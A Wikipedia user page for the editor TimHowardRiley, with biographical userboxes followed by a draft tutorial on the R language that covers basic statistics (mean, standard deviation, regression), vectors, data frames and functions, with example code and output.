user:Timhowardriley

User:TimHowardRiley

{{RainbowBar|7}}

Contributing editor, database programmer, and musician

style="margin: 1em auto 1em auto"

| {{User degree/BSc subject | Computer Science}} {{userbox|gold|white|45px| This user graduated magna cum laude from Florida International University.}}

{{userbox|green|white|45px| This user has a Business Administration (Accountancy) degree from California State University, Sacramento.}} {{userbox|border=1|border-color=#000000|#CCCC99|#CCCC99|65px| This user is writing a [https://appahost.com/predictive_algorithms.pdf book].}}
{{User Software Engineer}}

{{user c-5}}

{{userbox|border=1|border-color=#000000|#ffc6a5|#ffc6a5|80px| This user programmed the research databases at the Everglades National Park.}}

{{userbox|border=1|border-color=#000000|#ffc6a5|#ffc6a5|94px| This user used to commute daily to [http://timriley.net/redirects/commute.html here].}}

{{userbox|border=1|border-color=#ff8800|#c6daf7|#c6daf7|60px| This user's first computer was a TRS-80 Model I.}} {{User:Blast san/userboxes/User website here|appahost.com}}
{{user mysql}}

{{User linux}}

{{userbox|border=1|border-color=#ff8800|#c6daf7|#c6daf7|50px| This user misses his 1966 Ford Mustang Convertible.}} {{userbox|border=1|border-color=#000000|#e7f784|#e7f784|65px| This user just LOVES to cycle here.}}
{{user trombone}}

{{userbox|border=1|border-color=#000000|lightblue|lightblue|42px| This user served in the Army Band at Fort Benning.}}

{{userbox|border=1|border-color=#000000|white|white|80px| This user believes Be Afraid is an unfortunate reality. "You should also learn that Wikipedia users often display ownership of articles they've edited."}}

R programming language

= Examples =

== Mean -- a measure of center ==

A numeric data set may have a central tendency — where some of the most typical data points reside.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 90

| isbn = 0-201-71058-7

}} The arithmetic mean (average) is the most commonly used measure of central tendency. The mean of a numeric data set is the sum of the data points divided by the number of data points.

:Let x = a list of data points.

:Let n = the number of data points.

:Let \bar{x} = the mean of a data set.

:\bar{x} = \frac{x_1+x_2+\cdots +x_n}{n}

Suppose a sample of four observations of Celsius temperature measurements were taken 12 hours apart.

:Let x = a list of degrees Celsius data points of 30, 27, 31, 28.

This R computer program will output the mean of x:

  1. The c() function "combines" a list into a single object.

x <- c( 30, 27, 31, 28 )

sum <- sum( x )

length <- length( x )

mean <- sum / length

message( "Mean:" )

print( mean )

Note: R can have the same identifier represent both a function name and its result. For more information, visit scope.

Output:

Mean:

[1] 29

This R program will execute the native mean() function to output the mean of x:

x <- c( 30, 27, 31, 28 )

message( "Mean:" )

print( mean( x ) )

Output:

Mean:

[1] 29

== Standard Deviation -- a measure of dispersion ==

A standard deviation of a numeric data set is an indication of the average distance all the data points are from the mean.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 105

| isbn = 0-201-71058-7

}} For a data set with a small amount of variation, then each data point will be close to the mean, so the standard deviation will be small.

:Let x = a list of data points.

:Let n = the number of data points.

:Let s = the standard deviation of a data set.

:s = \sqrt{\frac{\sum\left(x_i - \bar{x}\right)^2}{n - 1}}

Suppose a sample of four observations of Celsius temperature measurements were taken 12 hours apart.

:Let x = a list of degrees Celsius data points of 30, 27, 31, 28.

This R program will output the standard deviation of x:

x <- c( 30, 27, 31, 28 )

distanceFromMean <- x - mean( x )

distanceFromMeanSquared <- distanceFromMean ** 2

distanceFromMeanSquaredSum <- sum( distanceFromMeanSquared )

variance <- distanceFromMeanSquaredSum / ( length( x ) - 1 )

standardDeviation <- sqrt( variance )

message( "Standard deviation:" )

print( standardDeviation )

Output:

Standard deviation:

[1] 1.825742

This R program will execute the native sd() function to output the standard deviation of x:

x <- c( 30, 27, 31, 28 )

message( "Standard deviation:" )

print( sd( x ) )

Output:

Standard deviation:

[1] 1.825742

== Linear regression -- a measure of relation ==

[[File:Linear least squares example2.svg|thumb|A scatter plot resembling a linear relationship has infinitely many{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 155

| isbn = 0-201-71058-7

}} straight lines that will pass close to all the data points (depicted in red). The blue regression line (generally called curve fit) is the one straight line that has the minimum average distance (depicted in green) from all the points to the line.]]

A phenomenon may be the result of one or more observable events. For example, the phenomenon of skiing accidents may be the result of having snow in the mountains. A method to measure whether or not a numeric data set is related to another data set is linear regression.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 146

| isbn = 0-201-71058-7

}}

:Let x = a data set of independent data points, in which each point occurred at a specific time.

:Let y = a data set of dependent data points, in which each point occurred at the same time of an independent data point.

If a linear relationship exists, then a scatter plot of the two data sets will show a pattern that resembles a straight line.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 148

| isbn = 0-201-71058-7

}} If a straight line is embedded into the scatter plot such that the average distance from all the points to the line is minimal, then the line is called a regression line. The equation of the regression line is called the regression equation.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 156

| isbn = 0-201-71058-7

}}

The regression equation is a linear equation; therefore, it has a slope and y-intercept. The format of the regression equation is \hat{y} = b_{0} + b_{1}x.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 157

| isbn = 0-201-71058-7

}}{{efn|The format of the regression equation differs from the algebraic format of y = ax + b. The y-intercept is placed first, and all of the independent variables are appended to the right.}}

:Let b_{1} = the slope of the regression equation.

:b_{1} = \frac{\sum\left(x - \bar{x}\right)\left(y - \bar{y}\right)}{\sum\left(x - \bar{x}\right)^2}

:Let b_{0} = the y-intercept of the regression equation.

:b_{0} = \bar{y} - b_{1}\bar{x}

Suppose a sample of four observations of Celsius temperature measurements were taken 12 hours apart. At the same time, the thermometer was switched to Fahrenheit temperature and another measurement was taken.

:Let x = a list of degrees Celsius data points of 30, 27, 31, 28.

:Let y = a list of degrees Fahrenheit data points of 86.0, 80.6, 87.8, 82.4.

This R program will output the slope and y-intercept of a linear relationship in which y depends upon x:

x <- c( 30, 27, 31, 28 )

y <- c( 86.0, 80.6, 87.8, 82.4 )

  1. Build the numerator

independentDistanceFromMean <- x - mean( x )

sampledDependentDistanceFromMean <- y - mean( y )

independentDistanceTimesSampledDistance <-

independentDistanceFromMean *

sampledDependentDistanceFromMean

independentDistanceTimesSampledDistanceSum <-

sum( independentDistanceTimesSampledDistance )

  1. Build the denominator

independentDistanceFromMeanSquared <-

independentDistanceFromMean ** 2

independentDistanceFromMeanSquaredSum <-

sum( independentDistanceFromMeanSquared )

  1. Slope is rise over run

slope <-

independentDistanceTimesSampledDistanceSum /

independentDistanceFromMeanSquaredSum

yIntercept <- mean( y ) - slope * ( mean( x ) )

message( "Slope:" )

print( slope )

message( "Y-intercept:" )

print( yIntercept )

Output:

Slope:

[1] 1.8

Y-intercept:

[1] 32

This R program will execute the native functions to output the slope and y-intercept:

x <- c( 30, 27, 31, 28 )

y <- c( 86.0, 80.6, 87.8, 82.4 )

  1. Execute lm() with Fahrenheit depends upon Celsius

linearModel <- lm( y ~ x )

  1. coefficients() returns a structure containing the slope and y intercept

coefficients <- coefficients( linearModel )

  1. Extract the slope from the structure

slope <- coefficients"x"

  1. Extract the y intercept from the structure

yIntercept <- coefficients"(Intercept)"

message( "Slope:" )

print( slope )

message( "Y-intercept:" )

print( yIntercept )

Output:

Slope:

[1] 1.8

Y-intercept:

[1] 32

== Coefficient of determination -- a percentage of variation ==

The coefficient of determination determines the percentage of variation explained by the independent variable.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 170

| isbn = 0-201-71058-7

}} It always lies between 0 and 1.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 175

| isbn = 0-201-71058-7

| quote = The coefficient of determination always lies between 0 and 1 ...

}} A value of 0 indicates no relationship between the two data sets, and a value near 1 indicates the regression equation is extremely useful for making predictions.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 175

| isbn = 0-201-71058-7

}}

:Let \hat{y} = the data set of predicted response data points when the independent data points are passed through the regression equation.

:Let r^{2} = the coefficient of determination in a relationship between an independent variable and a dependent variable.

:r^{2} = \frac{\sum\left(\hat{y} - \bar{y}\right)^2}{\sum\left(y - \bar{y}\right)^2}

This R program will output the coefficient of determination of the linear relationship between x and y:

x <- c( 30, 27, 31, 28 )

y <- c( 86.0, 80.6, 87.8, 82.4 )

  1. Build the numerator

linearModel <- lm( y ~ x )

coefficients <- coefficients( linearModel )

slope <- coefficients"x"

yIntercept <- coefficients"(Intercept)"

predictedResponse <- yIntercept + ( slope * x )

predictedResponseDistanceFromMean <-

predictedResponse - mean( y )

predictedResponseDistanceFromMeanSquared <-

predictedResponseDistanceFromMean ** 2

predictedResponseDistanceFromMeanSquaredSum <-

sum( predictedResponseDistanceFromMeanSquared )

  1. Build the denominator

sampledResponseDistanceFromMean <- y - mean( y )

sampledResponseDistanceFromMeanSquared <-

sampledResponseDistanceFromMean ** 2

sampledResponseDistanceFromMeanSquaredSum <-

sum( sampledResponseDistanceFromMeanSquared )

coefficientOfDetermination <-

predictedResponseDistanceFromMeanSquaredSum /

sampledResponseDistanceFromMeanSquaredSum

message( "Coefficient of determination:" )

print( coefficientOfDetermination )

Output:

Coefficient of determination:

[1] 1

This R program will execute the native functions to output the coefficient of determination:

x <- c( 30, 27, 31, 28 )

y <- c( 86.0, 80.6, 87.8, 82.4 )

linearModel <- lm( y ~ x )

summary <- summary( linearModel )

coefficientOfDetermination <- summary"r.squared"

message( "Coefficient of determination:" )

print( coefficientOfDetermination )

Output:{{efn|This may display to standard error a warning message that the summary may be unreliable. Nonetheless, the output of 1 is correct.}}

Coefficient of determination:

[1] 1

== Scatter plot ==

This R program will display a scatter plot with an embedded regression line and regression equation illustrating the relationship between x and y:

x <- c( 30, 27, 31, 28 )

y <- c( 86.0, 80.6, 87.8, 82.4 )

linearModel <- lm( y ~ x )

coefficients <- coefficients( linearModel )

slope <- coefficients"x"

intercept <- coefficients"(Intercept)"

  1. Execute paste() to build the regression equation string

regressionEquation <- paste( "y =", intercept, "+", slope, "x" )

  1. Display a scatter plot with the regression line and equation embedded

plot(

x,

y,

main = "Fahrenheit Depends Upon Celsius",

sub = regressionEquation,

xlab = "Degress Celsius",

ylab = "Degress Fahrenheit",

abline( linearModel ) )

Output:

File:Regression fahrenheit depends celsius.pdf

= Programming =

R is an interpreted language, so programmers typically access it through a command-line interpreter. If a programmer types 1+1 at the R command prompt and presses enter, the computer replies with 2.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 4

| isbn = 978-1-449-35901-0

}} Programmers also save R programs to a file then execute the batch interpreter [https://linux.die.net/man/1/rscript Rscript].{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 20

| isbn = 978-1-449-35901-0

| quote=An R script is just a plain text file that you save R code in.

}}

== Object ==

R stores data inside an object. An object is assigned a name which the computer program uses to set and retrieve a value.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 7

| isbn = 978-1-449-35901-0

}} An object is created by placing its name to the left of the symbol-pair <-.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 8

| isbn = 978-1-449-35901-0

}} The symbol-pair <- is called the assignment operator.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 77

| isbn = 978-1-449-35901-0

}}

To create an object named x and assign it the integer value 82:

x <- 82L

print( x )

Output:

[1] 82

The [1] displayed before the number is a subscript. It shows the container for this integer is index one of an array.

== Vector ==

The most primitive R object is the vector.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 37

| isbn = 978-1-449-35901-0

}} A vector is a one dimensional array of data. To assign multiple elements to the array, use the c() function to "combine" the elements. The elements must be the same data type.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 38

| isbn = 978-1-449-35901-0

}} R lacks scalar data types, which are placeholders for a single word — usually an integer. Instead, a single integer is stored into the first element of an array. The single integer is retrieved using the index subscript of [1].{{efn|To retrieve the value of an array of length one, the index subscript is optional.}}

R program to store and retrieve a single integer:

store <- 82L

retrieve <- store[1]

print( retrieve[1] )

Output:

[1] 82

=== Element-wise operation ===

When an operation is applied to a vector, R will apply the operation to each element in the array. This is called an element-wise operation.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 10

| isbn = 978-1-449-35901-0

}}

This example creates the object named x and assigns it integers 1 through 3. The object is displayed and then again with one added to each element:

x <- 1:3

print( x )

print( x + 1 )

Output:

[1] 1 2 3

[1] 2 3 4

To achieve the many additions, R implements vector recycling. The numeral one following the plus sign (+) is converted into an internal array of three ones. The + operation simultaneously loops through both arrays and performs the addition on each element pair. The results are stored into another internal array of three elements which is returned to the print() function.

=== Numeric vector ===

A numeric vector is used to store integers and floating point numbers.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 39

| isbn = 978-1-449-35901-0

}} The primary characteristic of a numeric vector is the ability to perform arithmetic on the elements.

==== Integer vector ====

By default, integers (numbers without a decimal point) are stored as floating point. To force integer memory allocation, append an L to the number. As an exception, the sequence operator : will, by default, allocate integer memory.

R program:

x <- 82L

print( x[1] )

message( "Data type:" )

typeof( x )

Output:

[1] 82

Data type:

[1] "integer"

R program:

x <- c( 1L, 2L, 3L )

print( x )

message( "Data type:" )

typeof( x )

Output:

[1] 1 2 3

Data type:

[1] "integer"

R program:

x <- 1:3

print( x )

message( "Data type:" )

typeof( x )

Output:

[1] 1 2 3

Data type:

[1] "integer"

==== Double vector ====

A double vector stores real numbers, which are also known as floating point numbers. The memory allocation for a floating point number is double precision. Double precision is the default memory allocation for numbers with or without a decimal point.

R program:

x <- 82

print( x[1] )

message( "Data type:" )

typeof( x )

Output:

[1] 82

Data type:

[1] "double"

R program:

x <- c( 1, 2, 3 )

print( x )

message( "Data type:" )

typeof( x )

Output:

[1] 1 2 3

Data type:

[1] "double"

=== Logical vector ===

A logical vector stores binary data — either TRUE or FALSE. The purpose of this vector is to store the result of a comparison.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 42

| isbn = 978-1-449-35901-0

}} A logical datum is expressed as either TRUE, T, FALSE, or F. The capital letters are required, and no quotes surround the constants.

R program:

x <- 3 < 4

print( x[1] )

message( "Data type:" )

typeof( x )

Output:

[1] TRUE

Data type:

[1] "logical"

Two vectors may be compared using the following logical operators:{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 81

| isbn = 978-1-449-35901-0

}}

border="1" class="wikitable"

! Operator

! Syntax

! Tests

{{mono|>}}

| {{mono|a > b}}

| Is a greater than b?

{{mono|1=>=}}

| {{mono|1=a >= b}}

| Is a greater than or equal to b?

{{mono|<}}

| {{mono|a < b}}

| Is a less than b?

{{mono|1=<=}}

| {{mono|1=a <= b}}

| Is a less than or equal to b?

{{mono|1===}}

| {{mono|1=a == b}}

| Is a equal to b?

{{mono|1=!=}}

| {{mono|1=a != b}}

| Is a not equal to b?

=== Character vector ===

A character vector stores character strings.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 41

| isbn = 978-1-449-35901-0

}} Strings are created by surrounding text in double quotation marks.

R program:

x <- "hello world"

print( x[1] )

message( "Data type:" )

typeof( x )

Output:

[1] "hello world"

Data type:

[1] "character"

R program:

x <- c( "hello", "world" )

print( x )

message( "Data type:" )

typeof( x )

Output:

[1] "hello" "world"

Data type:

[1] "character"

=== Factor ===

A Factor is a vector that stores a categorical variable.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 49

| isbn = 978-1-449-35901-0

}} The factor() function converts a text string into an enumerated type, which is stored as an integer.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 50

| isbn = 978-1-449-35901-0

}}

In experimental design, a factor is an independent variable to test (an input) in a controlled experiment.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 25

| isbn = 0-201-71058-7

}} A controlled experiment is used to establish causation, not just association.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 23

| isbn = 0-201-71058-7

}} For example, one could notice that an increase in hot chocolate sales is associated with an increase in skiing accidents.

An experimental unit is an item that an experiment is being performed upon. If the experimental unit is a person, then it is known as a subject. A response variable (also known as a dependent variable) is a possible outcome from an experiment. A factor level is a characteristic of a factor. A treatment is an environment consisting of a combination of one level (characteristic) from each of the input factors. A replicate is the execution of a treatment on an experimental unit and yields response variables.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 24

| isbn = 0-201-71058-7

}}

This example builds two R programs to model an experiment to increase the growth of a species of cactus. Two factors are tested:

  1. water levels of none, light, or medium
  2. superabsorbent polymer levels of not used or used

R program to setup the design:

  1. Step 1 is to establish the levels of a factor.
  2. Vector of the water levels:

waterLevel <-

c(

"none",

"light",

"medium" )

  1. Step 2 is to create the factor.
  2. Vector of the water factor:

waterFactor <-

factor(

# Although a subset is possible, use all of the levels.

waterLevel,

levels = waterLevel )

  1. Vector of the polymer levels:

polymerLevel <-

c(

"notUsed",

"used" )

  1. Vector of the polymer factor:

polymerFactor <-

factor(

polymerLevel,

levels = polymerLevel )

  1. The treatments are the Cartesian product of both factors.

treatmentCartesianProduct <-

expand.grid(

waterFactor,

polymerFactor )

message( "Water factor:" )

print( waterFactor )

message( "\nPolymer factor:" )

print( polymerFactor )

message( "\nTreatment Cartesian product:" )

print( treatmentCartesianProduct )

Output:

Water factor:

[1] none light medium

Levels: none light medium

Polymer factor:

[1] notUsed used

Levels: notUsed used

Treatment Cartesian product:

Var1 Var2

1 none notUsed

2 light notUsed

3 medium notUsed

4 none used

5 light used

6 medium used

R program to store and display the results:

experimentalUnit <- c( "cactus1", "cactus2", "cactus3" )

replicateWater <- c( "none", "light", "medium" )

replicatePolymer <- c( "notUsed", "used", "notUsed" )

replicateInches <- c( 82L, 83L, 84L )

response <-

data.frame(

experimentalUnit,

replicateWater,

replicatePolymer,

replicateInches )

print( response )

Output:

experimentalUnit replicateWater replicatePolymer replicateInches

1 cactus1 none notUsed 82

2 cactus2 light used 83

3 cactus3 medium notUsed 84

== Data frame ==

A data frame stores a two-dimensional array.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 55

| isbn = 978-1-449-35901-0

| quote = Data frames are the two-dimensional version of a list.

}} The horizontal dimension is a list of vectors. The vertical dimension is a list of rows. It is the most useful structure for data analysis.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 55

| isbn = 978-1-449-35901-0

| quote = They are far and away the most useful storage structure for data analysis[.]

}} Data frames are created using the data.frame() function. The input is a list of vectors (of any data type). Each vector becomes a column in a table. The elements in each vector are aligned to form the rows in the table.

R program:

integer <- c( 82L, 83L )

string <- c( "hello", "world" )

data.frame <- data.frame( integer, string )

print( data.frame )

message( "Data type:" )

class( data.frame )

Output:

integer string

1 82 hello

2 83 world

Data type:

[1] "data.frame"

Data frames can be deconstructed by providing a vector's name between double brackets.

This returns the original vector. Each element in the returned vector can be accessed by its index number.

R program to extract the word "world". It is stored in the second element of the "string" vector:

integer <- c( 82L, 83L )

string <- c( "hello", "world" )

data.frame <- data.frame( integer, string )

vector <- data.frame"string"

print( vector[2] )

message( "Data type:" )

typeof( vector )

Output:

[1] "world"

Data type:

[1] "character"

== Vectorized coding ==

Vectorized coding is a method to produce quality R computer programs that take advantage of R's strengths.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 173

| isbn = 978-1-449-35901-0

}} The R language is designed to be fast at logical testing, subsetting, and element-wise execution. On the other hand, R does not have a fast for loop.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 185

| isbn = 978-1-449-35901-0

}} For example, R can search-and-replace faster using logical vectors than by using a for loop.

=== For loop ===

A for loop repeats a block of code for a specific number of iterations.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 165

| isbn = 978-1-449-35901-0

}}

Example to search-and-replace using a for loop:

vector <- c( "one", "two", "three" )

for ( i in 1:length( vector ) )

{

if ( vector[ i ] == "one" )

{

vector[ i ] <- "1"

}

}

message( "Replaced vector:" )

print( vector )

Output:

Replaced vector:

[1] "1" "two" "three"

=== Subsetting ===

R's syntax allows for a logical vector to be used as an index to a vector.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 69

| isbn = 978-1-449-35901-0

}} This method is called subsetting.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 80

| isbn = 978-1-449-35901-0

}}

R example:

vector <- c( "one", "two", "three" )

print( vector[ c( TRUE, FALSE, TRUE ) ] )

Output:

[1] "one" "three"

=== Change a value using an index number ===

R allows for the assignment operator <- to overwrite an existing value in a vector by using an index number.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 77

| isbn = 978-1-449-35901-0

}}

R example:

vector <- c( "one", "two", "three" )

vector[ 1 ] <- "1"

print( vector )

Output:

[1] "1" "two" "three"

=== Change a value using subsetting ===

R also allows for the assignment operator <- to overwrite an existing value in a vector by using a logical vector.

R example:

vector <- c( "one", "two", "three" )

vector[ c( TRUE, FALSE, FALSE ) ] <- "1"

print( vector )

Output:

[1] "1" "two" "three"

=== Vectorized code to search-and-replace ===

Because a logical vector may be used as an index, and because the logical operator returns a vector, a search-and-replace can take place without a for loop.

R example:

vector <- c( "one", "two", "three" )

vector[ vector == "one" ] <- "1"

print( vector )

Output:

[1] "1" "two" "three"

== Functions ==

A function is an object that stores computer code instead of data.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 16

| isbn = 978-1-449-35901-0

}} The purpose of storing code inside a function is to be able to reuse it in another context.

=== Native functions ===

R comes with over 1,000 native functions to perform common tasks.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 29

| isbn = 978-1-449-35901-0

}} To execute a function:

  1. type in the function's name
  2. type in an open parenthesis (
  3. type in the data to be processed
  4. type in a close parenthesis )

This example rolls a die one time. The native function's name is sample(). The data to be processed are:

  1. a numeric integer vector from one to six
  2. the size parameter instructs sample() to execute the roll one time

sample( 1:6, size=1 )

Possible output:

[1] 6

The R interpreter provides a help screen for each native function. The help screen is displayed after typing in a question mark followed by the function's name:

?sample

Partial output:

Description:

‘sample’ takes a sample of the specified size from the elements of

‘x’ using either with or without replacement.

Usage:

sample(x, size, replace = FALSE, prob = NULL)

==== Function parameters ====

The sample() function has available four input parameters. Input parameters are pieces of information that control the function's behavior. Input parameters may be communicated to the function in a combination of three ways:

  1. by position separated with commas
  2. by name separated with commas and the equal sign
  3. left empty

For example, each of these calls to sample() will roll a die one time:

sample( 1:6, 1, F, NULL )

sample( 1:6, 1 )

sample( 1:6, size=1 )

sample( size=1, x=1:6 )

Every input parameter has a name.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 13

| isbn = 978-1-449-35901-0

}} If a function has many parameters, setting name = data will make the source code more readable.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 14

| isbn = 978-1-449-35901-0

}} If the parameter's name is omitted, R will match the data in the position order. Usually, parameters that are rarely used will have a default value and may be omitted.

==== Data coupling ====

The output from a function may become the input to another function. This is the basis for data coupling.{{cite book

| last = Schach

| first = Stephen R.

| title = Software Engineering

| publisher = Aksen Associates Incorporated Publishers

| year = 1990

| page = 231

| isbn = 0-256-08515-3

}}

This example executes the function sample() and sends the result to the function sum(). It simulates the roll of two dice and adds them up.

sum( sample( 1:6, size=2, replace=TRUE ) )

Possible output:

[1] 7

==== Functions as parameters ====

A function has parameters typically to input data. Alternatively, a function (A) can use a parameter to input another function (B). Function (A) will assume responsibility to execute function (B).

For example, the function replicate() has an input parameter that is a placeholder for another function. This example will execute replicate() once, and replicate() will execute sample() five times. It will simulate rolling a die five times:

replicate( 5, sample( 1:6, size=1 ) )

Possible output:

[1] 2 4 1 4 5

==== Uniform distribution ====

Because each face of a die is equally likely to appear on top, rolling a die many times generates the uniform distribution.{{cite book

| last1 = Downing

| first1 = Douglas

| last2 = Clark

| first2 = Jeffrey

| title = Business Statistics

| publisher = Barron's

| year = 2003

| page = 163

| isbn = 0-7641-1983-4

}} This example displays a histogram of a die rolled 10,000 times:

hist( replicate( 10000, sample( 1:6, size=1 ) ) )

The output is likely to have a flat top:

File:R histogram uniform distribution.pdf

==== Central limit theorem ====

Whereas a numeric data set may have a central tendency, it also may not have a central tendency. Nonetheless, a data set of the arithmetic mean of many samples will have a central tendency to converge to the population's mean. The arithmetic mean of a sample is called the sample mean.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 95

| isbn = 0-201-71058-7

}} The central limit theorem states for a sample size of 30 or more, the distribution of the sample mean (\bar{x}) is approximately normally distributed, regardless of the distribution of the variable under consideration (x).{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 314

| isbn = 0-201-71058-7

}} A histogram displaying a frequency of data point averages will show the distribution of the sample mean resembles a bell-shaped curve.

For example, rolling one die many times generates the uniform distribution. Nonetheless, rolling 30 dice and calculating each average (\bar{x}) over and over again generates a normal distribution.

R program to roll 30 dice 10,000 times and plot the frequency of averages:

hist(

replicate(

10000,

mean(

sample(

1:6,

size=30,

replace=T ) ) ) )

The output is likely to have a bell shape:

File:R histogram sample mean.pdf

=== Programmer-created functions ===

To create a function object, execute the function() statement and assign the result to a name.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 17

| isbn = 978-1-449-35901-0

}} A function receives input both from global variables and input parameters (often called arguments). Objects created within the function body remain local to the function.

R program to create a function:

  1. The input parameters are x and y.
  2. The return value is a numeric double vector.

f <- function(x, y)

{

first_expression <- x * 2

second_expression <- y * 3

first_expression + second_expression

# The return statement may be omitted

# if the last expression is unassigned.

# This will save a few clock cycles.

}

Usage output:

> f(1, 2)

[1] 8

Function arguments are passed in by value.

=== Generic functions ===

R supports generic functions, which is also known as polymorphism. Generic functions act differently depending on the class of the argument passed in. The process is to dispatch the method specific to the class. A common implementation is R's print() function. It can print almost every class of object. For example, print(objectName).{{cite web

|author=R Core Team

|title=Print Values

|url=https://stat.ethz.ch/R-manual/R-devel/library/base/html/print.html

|access-date=30 May 2016

|website=R Documentation

|publisher=R Foundation for Statistical Computing}}

== If statements ==

R program illustrating if statements:

minimum <- function( a, b )

{

if ( a < b )

minimum <- a

else

minimum <- b

return( minimum )

}

maximum <- function( a, b )

{

if ( a > b )

maximum <- a

else

maximum <- b

return( maximum )

}

range <- function( a, b, c )

{

range <-

maximum( a, maximum( b, c ) ) -

minimum( a, minimum( b, c ) )

return( range )

}

range( 10, 4, 7 )

Output:

[1] 6

== Programming shortcuts ==

R provides three notable shortcuts available to programmers.

=== Omit the print() function ===

If an object is present on a line by itself, then the interpreter will send the object to the print() function.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 147

| quote = R calls print each time it displays a result in your console window.

| isbn = 978-1-449-35901-0

}}

R example:

integer <- 82L

integer

Output:

[1] 82

=== Omit the return() statement ===

If a programmer-created function omits the return() statement, then the interpreter will return the last unassigned expression.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 17

| quote = R will execute all of the code in the body and then return the result of the last line of code.

| isbn = 978-1-449-35901-0

}}

R example:

f <- function()

{

# Don't assign the expression to an object.

82L + 1L

}

Usage output:

> f()

[1] 83

=== Alternate assignment operator ===

The symbol-pair <- assigns a value to an object. Alternatively, = may be used as the assignment operator. However, care must be taken because = closely resembles the logical operator for equality, which is ==.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 82

| quote = Be careful not to confuse = with ==. = does the same thing as <-.

| isbn = 978-1-449-35901-0

}}

R example:

integer = 82L

print( integer )

Output:

[1] 82

